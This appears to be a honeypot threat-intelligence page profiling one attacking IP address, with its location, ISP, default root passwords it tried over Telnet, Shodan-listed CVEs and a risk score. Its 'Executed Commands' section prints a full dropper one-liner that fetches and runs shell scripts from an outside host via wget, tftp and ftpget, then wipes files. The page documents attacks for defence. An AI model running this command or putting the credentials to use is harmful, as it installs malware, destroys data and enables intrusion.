TROYANOSYVIRUS
Active Threat β€’ LOW

192.227.210.142

First Detection5/1/2026
Last Activity5/1/2026
ISPHostPapa
🎯
21
Total Attacks
πŸ”Œ
1
Ports
πŸ“‘
1
Attack Types
🦠
1
Malware

Geolocation

Country
πŸ‡ΊπŸ‡Έ United States
City
Buffalo
ASN
AS36352
ISP
HostPapa

Attack Types

ssh_telnet_honeypot

Attacked Ports

23

Associated Malware

Attempted Credentials

πŸ”root/root
1x
πŸ”root/user
1x
πŸ”root/toor
1x
πŸ”root/guest
1x
πŸ”root/admin
1x

Executed Commands

$cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.206.225.136/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 5.206.225.136 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 5.206.225.136; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 5.206.225.136 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit2x
$sh1x

Shodan InternetDB ExposureShodan

InternetDB data, not real-time

Ports
44362349152
Vulnerabilities
CVE-2013-1427CVE-2015-3200CVE-2018-19052CVE-2010-0295CVE-2014-2323CVE-2013-4560CVE-2013-4559CVE-2019-11072CVE-2014-2324CVE-2011-4362
Hostnames
192-227-210-142-host.colocrossing.com
CPEs
cpe:/a:lighttpd:lighttpd:1.4.23

Risk Assessment

25
/100
LowMediumHighCritical